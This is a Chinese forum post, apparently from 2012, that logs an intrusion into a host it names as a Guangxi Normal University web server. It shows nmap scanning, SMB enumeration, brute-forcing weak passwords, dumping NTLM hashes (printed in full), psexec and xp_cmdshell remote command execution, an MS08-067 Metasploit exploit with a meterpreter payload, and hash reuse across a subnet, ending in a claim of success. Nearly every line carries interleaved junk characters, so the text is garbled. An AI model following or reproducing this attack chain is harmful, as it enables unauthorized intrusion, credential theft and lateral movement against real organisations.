广西师范网站http://202.103.242.241/3 l+ Q3 @+ S3 {% u' Q0 D
6 _$ g9 [) ~) u# M5 I
root@bt:~# nmap -sS -sV 202.103.242.241( ~& u1 T) i: [4 V8 p
7 ?9 H. F! W8 S
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
c- g. }. X# M% O {
- z8 b: Q" D4 { N2 iNmap scan report for bogon (202.103.242.241)
9 z1 m: Q$ B5 b; S1 Z: H% h9 P0 j, |9 [( p
Host is up (0.00048s latency).# k$ P5 i* g2 a+ R# `
% k: a r5 e/ H: r5 O( ?: f
Not shown: 993 closed ports
9 z& y' k- |& C W- ?. R& E
0 H/ F N( j R& h& b+ K$ E/ oPORT STATE SERVICE VERSION* K# d1 q! d; i& b' E- z
4 z) f' ?# W, n: H2 G7 @
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)0 a% ~( Q w/ z0 z- T
$ y8 t1 _( ^# o0 M7 `7 K139/tcp open netbios-ssn
& r& l" n" ]5 z; _
+ V/ i# f1 Y! _8 v$ }' D445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
) {+ s" f: ~/ t- r" D t( Q- n# e: G
; ^3 a$ E& \( {2 Y! a1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)8 B n5 {# u( e0 i5 X& k
7 q$ B2 Q$ e5 S3 |6 J
1026/tcp open msrpc Microsoft Windows RPC' Y; |) p l: M: K G; S4 f2 c0 p
9 l. T+ f8 K3 d/ i3 i
3372/tcp open msdtc?
+ ]* p# m: G% o. @3 B+ f& X7 [/ @7 b0 x9 m7 u& S( ~
3389/tcp open ms-term-serv?
1 I- e# L: ]3 ?# }$ ?/ N
9 T+ S; f& C6 x; L6 s% r2 d0 X- e1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :( W0 C$ q1 S4 _4 C
SF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r" I( ]$ m. v' s; Z. f" s/ g o
3 ~0 y9 z! F% F1 Q. C* i# j8 h
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
+ c# T3 y( y7 t+ |0 G& k( i/ p9 r& H: c; x/ g0 v; w. Z, y* u3 l+ F
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
% X( M2 C/ [) ?* P/ N& o4 z/ Y7 \4 X
SF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
9 E( ]) Y- \0 X u* c$ E1 S0 v' u4 e# e1 j9 K2 t6 m
SF:ptions,6,”hO\n\x000Z”);
9 c1 K: @2 m$ l& M7 u% Y N9 d! \! q* D! F7 r
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
X0 O* r& Q c4 t) h" @* r. g
# J7 W: {! d4 T& m8 Z* O6 DService Info: OS: Windows
2 j& _- G$ H7 K4 B- d3 \
; j0 K- E$ s9 j: ?. v9 J+ J/ kService detection performed. Please report any incorrect results at http://nmap.org/submit/ .. m& c# U; [% ]# L
( u: U: z+ [/ |3 m) x" M
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds
5 W) s, G/ F' O# F2 b/ c9 R: ^- ?
* D( Q7 C* Y8 p: Oroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本" t6 U }$ ?; B
7 \7 w0 I; Z5 c V# q1 g0 l
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
7 y3 [ p9 z* }3 j
* X _/ ^/ o, ~' J-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
, [* }$ g9 n5 C$ Y7 B
8 G2 z9 K8 O3 ]! ^1 h, ]- Z-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
, N6 x6 n8 {1 O- Z4 h- ~2 o4 o% l5 ]9 X; D+ \7 F
-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
( z& E4 w2 C5 d
; ?5 n: E* ]. P4 o-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse1 J8 m W, `* w2 l) r* z
* U1 M* I2 @9 M; `8 [7 J, D
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
( J& T3 w4 i, c7 O" e, m, e, o9 l- c7 n0 b
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
# L1 ~; u' V: N L1 Y% c# [# G& E% i% t' y
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
0 T, Z! Q1 C9 r. e" \- `8 M3 ?0 c; p( n
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
* E$ c7 U6 N/ Q4 {5 `) j1 I
* p6 `$ w, i$ M9 b7 F; R-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse. a1 D+ Q% W* A. S* p/ q
7 S0 s9 |- Y6 w3 G* ?8 C n9 O
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse# G: c4 N, M7 j5 D& k8 w; `
$ u+ a/ g H% z5 O9 _5 y
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
, n# X: D# k+ C. j: `1 ^& y2 i3 n e' `. t+ j
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse& T/ X, r* P3 N, E' _
1 p1 p0 Y& B# h9 V9 Z7 G# _-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse- ^2 v3 f. K: b) [6 \$ [
$ V# m1 t% p$ x; A- x-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse& a% E; X$ P' W% v0 t
" r% Q4 d5 g; x
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 9 G$ w9 S8 c: h& X" Q
0 O5 F' T' q7 b5 k7 o( d
//此乃使用脚本扫描远程机器所存在的账户名0 i$ K0 \' I- ?* E. @) _5 v
y4 k: X, p, t' k2 E& ~! ^8 }/ W
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST ~+ Q3 Q# M6 F
# b* u* }" P3 Y W3 XNmap scan report for bogon (202.103.242.241)$ A' p% f( G, y3 N" V- E: k- a4 {7 H
) z4 x1 w4 q3 r) Q) GHost is up (0.00038s latency).
# B& ~6 V l! a: i' E' [. j; z5 i% Q2 \/ ]; A5 i, P+ G8 o
Not shown: 993 closed ports
$ m4 F- N% i) u L, `
' F) N$ q" m1 N; W" a! C7 M QPORT STATE SERVICE, E0 b, K0 D( B9 g7 i- P
! V% z8 n" r' y3 f, X$ L7 Z
135/tcp open msrpc
; l) T7 ?" f/ P; Z W2 G8 J% q
3 z. O' O! f+ D5 }2 C& |139/tcp open netbios-ssn" l/ u$ F% L- t
5 E6 z, S8 j* ~* W445/tcp open microsoft-ds. K4 L% X$ H+ g! k) t1 n3 r" H, \
0 L+ a4 H- s4 z1025/tcp open NFS-or-IIS/ @5 N9 q! c) E2 x& `# Y2 W8 l# o
7 x6 C3 \( o5 Q7 Q- T! T
1026/tcp open LSA-or-nterm, b, r. T6 j4 ]: n: @# Y
9 P ?- a% C, X5 I9 t
3372/tcp open msdtc" D u+ ~+ X' P
& G0 O0 g2 j7 b& N: e% p2 M
3389/tcp open ms-term-serv
# Z( l+ N- W* U9 Q9 M
7 X4 q: N0 D' P J5 c w% ^/ AMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
) d/ }6 M. T! R6 \ X+ B% N; c2 s1 \" e, E5 @; _! X
Host script results:
& t: J( p% ?) H2 S: Z
8 G& }) ^' b3 O K _3 f0 y2 Q| smb-enum-users:; Q& f h1 f" o. P8 I* E1 V
" v$ E! z9 y- e! d1 U
|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果: H# z- f( ]" m- u5 c
' ?) \( }2 Y, _, K, d/ S, \% y
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
% f8 y5 P! S+ F; Z" J; F2 e# ^" ]4 t6 V6 {' i2 m3 u
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 9 H4 Y6 A/ _/ }3 A' ~
" _4 A W I7 ]& R% }/ M+ E8 i
//查看共享
& \; M6 z! T) s; V; o' c1 V
9 o, N$ @' t/ b2 T' s" o$ O% Q2 y7 dStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
+ ~% }6 b( E4 |& M& G q/ V9 H# N y; l% E9 Z" l2 g
Nmap scan report for bogon (202.103.242.241)
4 a, ~; ~6 ^. l8 s$ ?: j9 C' ?- O2 p# h6 C( `3 d, d+ O6 z7 Y. m' u
Host is up (0.00035s latency).! Q$ O/ H$ t9 P! ]* D
/ Y! f) {/ m/ @/ e3 Q6 E' ^Not shown: 993 closed ports) b6 A4 q& p _7 D/ w
+ I: Z" X* n* }/ P, I
PORT STATE SERVICE: h' @3 w5 R6 J6 J4 {6 W
& r% R1 \' N1 g3 T7 Y8 P) @$ k0 F135/tcp open msrpc
/ A' P% t: o2 a" f. `/ T
6 l/ G3 |$ F. {, Y: ~) V# E139/tcp open netbios-ssn$ k3 P) g, j4 c
( p j; ?- |/ F4 G% V9 `9 k445/tcp open microsoft-ds
* {, R" y# ~5 m3 k5 K$ z s Q P! K" j* p3 q T, d
1025/tcp open NFS-or-IIS* F; p/ L2 d. n C) a, C) C
' W5 a: J1 \) F! C" Z- x( ?1026/tcp open LSA-or-nterm0 j0 c. ~; V2 m- h7 {
/ `- C% G( ]* q. Z0 A/ m$ ?" @$ [3372/tcp open msdtc
0 e( E2 I- Y; k; U8 s s4 x6 Q7 x8 s+ n4 z" P; S
3389/tcp open ms-term-serv
! C( S* z, G+ E* d
$ ~* B7 d/ x, D" ^MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
1 J5 Q8 d1 |, l8 d- D- w4 Y! G# N r
Host script results:
- n' U! H2 C& i9 w j" P; \3 s6 q z; R& G2 `& i7 K) W, Z
| smb-enum-shares:! _2 i% v7 w0 l) X: r' ]0 |
1 X6 y2 z& B' T2 {+ |# z| ADMIN$
% ], \9 p: Z5 `* ]; Z8 \& F2 v
+ N* M7 `2 d: B1 R' [3 b4 d| Anonymous access: <none>
- {0 s+ k5 A2 o& m4 E- C# @6 a& J/ v: {/ J. E0 N; C: R
| C$
& S- Q$ T; U+ g9 V0 \
6 L# `3 c4 M4 I, K3 t, H2 ^| Anonymous access: <none>
' P% m l' V! i& T
& f' F8 y% D) c( j# B| IPC$
# d) A4 v/ h6 {# U8 V% x+ w
' Z5 y3 l, A3 C0 I8 k/ }|_ Anonymous access: READ
1 V7 W; i5 X3 [0 l, Z' ]5 b( H, z% v0 m
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds, w3 z' Q1 h* v; s
' Q, V8 H7 @. b; C0 {" U
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 9 }1 v) Y c. G) q. v6 d7 P) A1 d
, \9 Z# P: E" b1 u5 y1 z
//获取用户密码 h5 L( O* f% \' D% d1 b1 F0 g
* V4 p) Q! t9 dStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST8 [# o1 r, O0 [9 e& o8 X, \" q/ z
- z! X; y0 k1 W+ w: x! _Nmap scan report for bogon (202.103.242.2418)
; [8 i& U+ n9 T' \- k. O1 v/ `5 {) S( O' ^5 Z
Host is up (0.00041s latency).' T" u L) v; r) U0 ~! Y
& w* ~: w% m: f! |8 f) ?& _Not shown: 993 closed ports- p4 a8 r- J1 O& Y
( l/ F& f# F: a0 Z1 U" [: u! TPORT STATE SERVICE2 I0 F$ H' L) w5 D
( a% J; n! \. E! T2 g135/tcp open msrpc
; p/ S* R' k8 d w$ a* X" r) X5 ]# @+ O+ s- Y
139/tcp open netbios-ssn
) w' z# }. |. N& W, C! r
/ b* \( O! @2 I4 L2 t# U% a( m445/tcp open microsoft-ds8 \4 i; V9 Z* o- T1 o
|0 `3 q/ a& g/ l1025/tcp open NFS-or-IIS
/ \) h5 Z( r. G2 p
: P# O6 t# j8 H5 E. |; e# D+ b1026/tcp open LSA-or-nterm( y5 a7 t9 y' O0 g
8 {8 [, d! B/ [- g* y
3372/tcp open msdtc8 s8 s* D6 i( c+ t [- ~) D
5 d1 j) U! U. E3389/tcp open ms-term-serv
( i5 {' j9 a+ Y% U6 T- E$ ^6 f/ U" C! W ^' a
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)1 Z0 ?* r1 L, ?4 E: Y0 n
5 Y2 v) m! h0 K2 hHost script results:3 A2 w& H& s- i. g7 ^( a
* L6 D, R o j0 J* p% p. R0 |
| smb-brute:
. F9 f2 ~) e- J7 }2 u2 ^
7 A# a" @6 s* ^& N% U) oadministrator:<blank> => Login was successful
- c3 b, i9 g! n3 ]
+ o* A; q+ @' ~2 f1 I! a|_ test:123456 => Login was successful
- i" U" M5 t4 w, R6 q8 B# b: l: d# \. W/ H3 L- Q% i& Z& o
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
/ j8 a2 M1 l: i) t+ |, P- {9 _
0 \! |+ l; Y! c# _0 R) k3 ?root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash1 ?, \: F8 Z$ R9 K( G# Y, D
; d/ E3 {# F5 p: W* sroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data7 ^- t' g( F8 E
$ m/ s. ?8 G2 I! k2 A
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
: P9 y& [- I2 [# Z) v1 p% ] U5 Y5 h' ]
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
9 T+ h Q! g3 g$ u) ]
+ S) R9 h2 A) f0 w- ^$ kStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
: A# A( F4 F9 {* b1 Z
$ l" Y% \7 J% |# l. S+ ~4 b( _Nmap scan report for bogon (202.103.242.241)
$ @/ h3 s, O0 @: z4 E# v- c( R% E8 I: y9 ~5 L3 |
Host is up (0.0012s latency).
/ j5 G" i6 f9 L; n# S% C! }
- v: L, t4 U, s- x* m! VPORT STATE SERVICE
/ b2 @- K& @' y. ?( {3 ]: F0 J1 U% _6 I6 U& B
135/tcp open msrpc j n) ]0 F( x% g
; ?0 G! M/ z g1 }7 ^2 K
139/tcp open netbios-ssn8 B8 | [7 M( Y% |+ w% w
7 ?: \2 @# v3 h( ~! ]+ |" ?# l
445/tcp open microsoft-ds) h2 W6 y3 v1 K v+ I/ u! F& A: M
( s: Y) p& l0 T n& V# c% D% [MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
0 {- \0 V% X4 N) N) @4 S) Q6 t& A+ J- d& p: v" D
Host script results:
8 w* u+ c' ]0 g2 t) u6 D
& M8 M( r4 B# z% O w+ {! K: O" F| smb-pwdump:% l6 d; Y+ \3 _* ]
8 s$ Z% O% E0 l4 u) A8 R| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************7 \9 r( H2 C8 t3 ?( I/ f; Y- u
0 G; G" S7 H' z: ?5 F8 z
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************/ y3 V x; r6 d, V
. A( x) j+ U- T2 x4 }5 \& l
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
, _& P5 b$ {) G' Z9 Q$ ~4 R3 |1 {: W* u2 i9 ?4 M& P
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2; q8 B- m" n: |" F* G& n4 G. z
0 D; f2 z. ?5 a# q2 w- p+ k" V; ONmap done: 1 IP address (1 host up) scanned in 1.85 seconds% O# ^: j/ P: z; L
; o0 y* h8 }( j" T0 H/ ~# Y8 {
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell& s8 E+ j9 G( U w
5 D- c6 a. t) D1 m7 y
-p 123456 -e cmd.exe1 D) ^$ h' L/ ~' G" l# t
5 J$ S! w/ ~6 o
PsExec v1.55 – Execute processes remotely
: G# b) S$ T6 C% a1 r
W# k8 l/ s* G8 O9 C$ s! d- e) `Copyright (C) 2001-2004 Mark Russinovich
# K6 c( S- r3 c$ E
' o, M7 E$ V0 g Q% E( _Sysinternals – www.sysinternals.com
$ X* k2 q: n$ f7 M$ s/ f( v. N, Q) o+ K g; ]2 [) R
Microsoft Windows 2000 [Version 5.00.2195]# I4 Z% a- m# A0 l( U. l
& P n3 X: ]6 z6 j9 H, d1 H(C) 版权所有 1985-2000 Microsoft Corp.$ A. W! P) i' ~ [0 j- Y E+ G2 V
! l- L# o& _$ x3 G: H; j7 `0 E7 g
C:\WINNT\system32>ipconfig4 T- M k. g- u" `% y, R. `' X
* J; |0 N+ e$ P& CWindows 2000 IP Configuration
4 W* y/ l3 @. o- T% C4 Q+ J
$ G' F7 |% `7 C; f SEthernet adapter 本地连接:
: e0 _& g7 \6 I
2 d1 _7 F- |2 L8 Q4 ]% @Connection-specific DNS Suffix . :
! \& F! \% w% \
( A. h3 w4 U2 j* ~7 yIP Address. . . . . . . . . . . . : 202.103.242.241
0 k% h- S" G9 A
/ o: w+ b5 J5 f1 lSubnet Mask . . . . . . . . . . . : 255.255.255.05 o0 E. X3 O6 w) \
, k; l. X' l. Y7 S$ M" U" E0 r2 ^
Default Gateway . . . . . . . . . : 202.103.1.10 E" @2 B& E, L% ^
# F# x; e f5 b! _! k! m- y
C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令8 Z9 l' o4 w8 {
, q! j- E" f) x3 t' f' U
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞
1 |0 A4 L S9 C7 X; ?4 |+ h/ X+ T" P$ t1 Z+ U/ _) C
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
8 B1 B7 u; h' q& |& ^1 Z
7 v$ Y1 l5 j" N! S( t9 J, wNmap scan report for bogon (202.103.242.241)/ ?; p( E- _/ x! u0 b
7 x% N* Y6 Q7 }3 d) X' `/ BHost is up (0.00046s latency).
4 t6 R) G) e) Z1 f1 g q
: E) G' e% [7 |$ D4 XNot shown: 993 closed ports3 S0 d. m' Q O8 s2 q& P% c7 _
5 J. L1 i0 Y+ K: H1 M/ v4 NPORT STATE SERVICE6 X: l5 v( |1 L- z: |: x& [
& K( ~ d- j2 y! G5 W; n% j135/tcp open msrpc9 R5 q u# _( Y; i/ o* R. S
' G% M. |. {" N* ^139/tcp open netbios-ssn1 p. f* }! `+ g; ?* \6 D8 q
' c% \+ F. |, [2 l8 r8 e: m445/tcp open microsoft-ds
* F* j E& C( ~. B+ q0 N
3 @( j9 u/ R) m, ^8 G1025/tcp open NFS-or-IIS
) i( u3 C! A* i
6 o' N* ^- d& t# q1026/tcp open LSA-or-nterm
$ h* K, B: {2 V R L& n) }+ I' z# H; F5 l* E: l( A
3372/tcp open msdtc3 V* y8 n; S' g. ^3 ^
2 ~ z% R' @" A M8 Y. J% }3389/tcp open ms-term-serv
( e" x" f3 i# ~# O9 ?
& W0 \0 a4 [9 G% J% P0 XMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
+ X" e6 n: ~3 P0 e n
! i9 ^0 y% u( \& h9 A/ ^0 N/ b8 xHost script results:- r$ h3 D$ R3 Y* }1 F
1 ?' Q9 U( O2 m5 G/ |2 U
| smb-check-vulns:5 v9 n, n. E n& g8 Z" a! [
( m8 G2 V8 _$ V0 Y- ~|_ MS08-067: VULNERABLE. f+ Z0 ~8 @2 q
# T9 G* j. @- f. O9 \: [Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
4 R. Q: U4 y# H- J8 O, D9 l0 W+ F; H7 [9 _
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出0 S9 R+ ?# c' O2 Z& ~- p* D
) X0 E2 B* ~: m" P" S2 Pmsf > search ms08
" {+ ~+ S( w. T( `4 F8 J9 `% Z( {7 Z4 t: j' F: m& x
msf > use exploit/windows/smb/ms08_067_netapi
! W7 k! @7 u2 g
( B! g* E& z. J. Q; _msf exploit(ms08_067_netapi) > show options: |# i. r# S+ p2 Q8 D+ ~
$ t1 \( j: }3 Z) w& rmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.241
. G3 P, q6 ^9 m6 k
& I) p( g/ F- o7 `7 U. ~msf exploit(ms08_067_netapi) > show payloads" X. E# E- ?; b2 ?- J
3 b; }& V6 S" O
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp" q( U& a/ R* p( ]& B: j
6 w& M% t' u1 a& U
msf exploit(ms08_067_netapi) > exploit X6 }' t9 W7 t- @9 `& N
! Y3 T# x2 C* B, M5 c+ N
meterpreter >: u/ {0 ]6 n$ v6 ?
, M( r5 q4 Y6 U6 O7 V" c- mBackground session 2? [y/N] (ctrl+z)% ~) N, w' H) i% Z
/ C1 L0 }/ b/ ^3 Hmsf exploit(ms08_067_netapi) > sessions -l ^0 v* H" O7 @8 ?" C% Z$ x T
2 f& D) n- i) s% ~
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt! e) Y& }# Y( F5 B. e2 M7 p
+ s4 Q. K S5 H3 z
test$ p$ V: I/ @2 G% z/ a+ M& A
% f( o, S, a/ O; q" Cadministrator
; p8 n5 f* c7 {6 d7 H0 ^/ L R8 P3 l6 ^( L! v, x" H
root@bt:/usr/local/share/nmap/scripts# vim password.txt+ A% M* V& m8 G4 a5 U1 v8 w5 W
% ?$ _3 `5 t) c9 D
44EFCE164AB921CAAAD3B435B51404EE
, P- u! X" u! v3 s2 l# x" R( L1 q
& V# U7 j; ?7 H6 K5 J6 a9 Mroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
2 z+ ^' i3 X# ^2 ]1 p' b% T# v) N) u$ U7 \3 J U( a$ j4 _% C
//利用用户名跟获取的hash尝试对整段内网进行登录7 ?! f8 A0 x& V6 I
0 w' [: J7 {6 }' u* Y: [# U* Z2 t" e
Nmap scan report for 192.168.1.105
) X. [/ }0 b3 f& K; N3 ~+ q% }7 }0 n; y J9 B# f- O
Host is up (0.00088s latency).( w& I4 i2 V% e
: k( V. q9 }5 N1 G( z
Not shown: 993 closed ports6 @0 r: Q0 p0 U, j/ p# z! O
* T6 W r! n% }8 G8 Y
PORT STATE SERVICE: l- U& [$ G# N4 ^: m5 m9 T9 x6 H" ?$ ]& M
4 T) _, F; M y! k! E135/tcp open msrpc- F' @$ `: v5 x
# W7 F* K. r, X! K8 t" |7 i
139/tcp open netbios-ssn" q3 i5 Y) E* L; u ^1 Z/ x
: v8 o' z2 o" {0 B, c; w2 C$ U( g+ m445/tcp open microsoft-ds
* g6 T- G Y+ S% ?3 s; \5 T; X# X* h9 c
1025/tcp open NFS-or-IIS
! a6 W6 j2 T# n, e
# P+ F0 c Q* c& h6 W1026/tcp open LSA-or-nterm& h' k: I- G2 X3 O* `
5 X& E. X7 Z! k0 B3372/tcp open msdtc) e6 W ~7 y' h& s" l9 o" L
6 v1 k% f2 H& d9 X( Z3389/tcp open ms-term-serv
. c2 \- v% m0 P0 E4 k
?- g" J& p e; S: {, C+ ZMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
h) P( C: K/ Y9 ^& U$ X" e9 x {) e
3 W# u& }% I; v1 I' aHost script results:
( L, V2 D, V4 a& L0 Z0 T% _4 H& a9 e/ i6 E
| smb-brute:! v1 l' b2 s% ~; L
8 n6 n' l5 v4 y|_ administrator:<blank> => Login was successful
' d, d Z4 \& |
' n B* P& }/ I4 K; f( O1 Y( O攻击成功,一个简单的msf+nmap攻击~~·
, S+ S# W# c6 G+ ~. z4 h0 h1 h$ f% ], F: c, @6 @
|
发表于 2012-12-4 12:46:42
收藏
支持
反对